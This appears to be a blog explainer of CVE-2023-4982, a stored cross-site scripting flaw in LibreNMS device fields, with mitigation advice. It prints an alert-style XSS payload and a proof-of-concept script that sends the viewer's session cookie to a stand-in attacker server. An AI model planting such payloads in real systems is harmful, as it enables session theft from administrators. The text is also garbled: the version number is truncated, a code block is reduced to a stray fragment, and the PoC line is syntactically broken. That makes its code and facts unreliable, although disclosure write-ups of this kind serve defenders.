CVE-2023-4982 - Stored XSS in LibreNMS Exploit Explained (Prior to 23.9.)

LibreNMS is a popular open-source network monitoring tool used by thousands of companies worldwide. In September 2023, security researchers revealed a serious vulnerability — CVE-2023-4982 — that affects versions before 23.9. and allows stored cross-site scripting (XSS) attacks via the web interface.

Let’s break down what this means, see a simple code example, and learn how attackers could exploit this issue.

What’s Stored Cross-site Scripting (Stored XSS)?

Stored XSS happens when an application saves untrusted data (like user input) and later displays it on web pages without properly filtering or escaping it. If malicious JavaScript code is stored and executed when others view the page, the attackers can steal cookies, hijack sessions, or deface content.

In CVE-2023-4982, LibreNMS failed to filter or sanitize certain inputs, allowing attackers to store dangerous JavaScript that runs for any other user who views the infected page.

Where Did The Vulnerability Occur?

The official GitHub security advisory explains:

> *“A vulnerability classified as problematic was found in LibreNMS. This affects the function ... of the file ... The manipulation of the argument ... leads to cross-site scripting. Stored XSS allows attackers to store malicious code that is executed when a legitimate user visits the vulnerable page.”*

Researchers found that certain forms in LibreNMS — like adding/renaming a device, setting a location, or adding a note — did not properly sanitize user-supplied HTML/JS.

`html

Trigger the XSS:

Any user who visits the page where device locations are listed automatically sees this script execute (in this case, a simple popup).

Full Example

Input Field: Device “Location”
Input Value:

<img src=1 onerror=alert('XSS: CVE-2023-4982')>

When another admin visits the device list, the browser executes this JS payload.

Persistence:

Since the script is *stored*, every subsequent user/viewer is affected until the value is cleaned up.

Practical Attacks:

- Stealing admin cookies/sessions.

PoC Code Snippet for Exploit

If you were writing a browser exploit as proof-of-concept, you might use this on any editable field in the vulnerable settings form:

<!-- Paste in a vulnerable LibreNMS input field -->
<script>
  fetch('https://yourserver.com/stealcookie?c='; + document.cookie);
</script>

This basic snippet secretly sends a user's session cookie to the attacker’s remote server.

Mitigation and Fix

The issue is patched in LibreNMS 23.9..
The official fix: input validation/sanitization during display (see patch).

References

- GitHub Advisory: GHSA-9gcj-c97w-8rp4
- LibreNMS Issue #15352
- NVD CVE-2023-4982 Breakdown
- OWASP: Cross-site Scripting (XSS)

Conclusion

CVE-2023-4982 is a classic stored XSS vulnerability in LibreNMS, easily triggered via certain form fields and leading to site-wide security risk for network monitoring teams.

Update now and check your systems!
Attackers only need one careless input to take over browser sessions or worse.

Stay secure!

> If you’d like to see more real-world exploits and breakdowns, leave a comment!

Timeline

Published on: 09/15/2023 01:15:00 UTC
Last modified on: 09/20/2023 13:13:00 UTC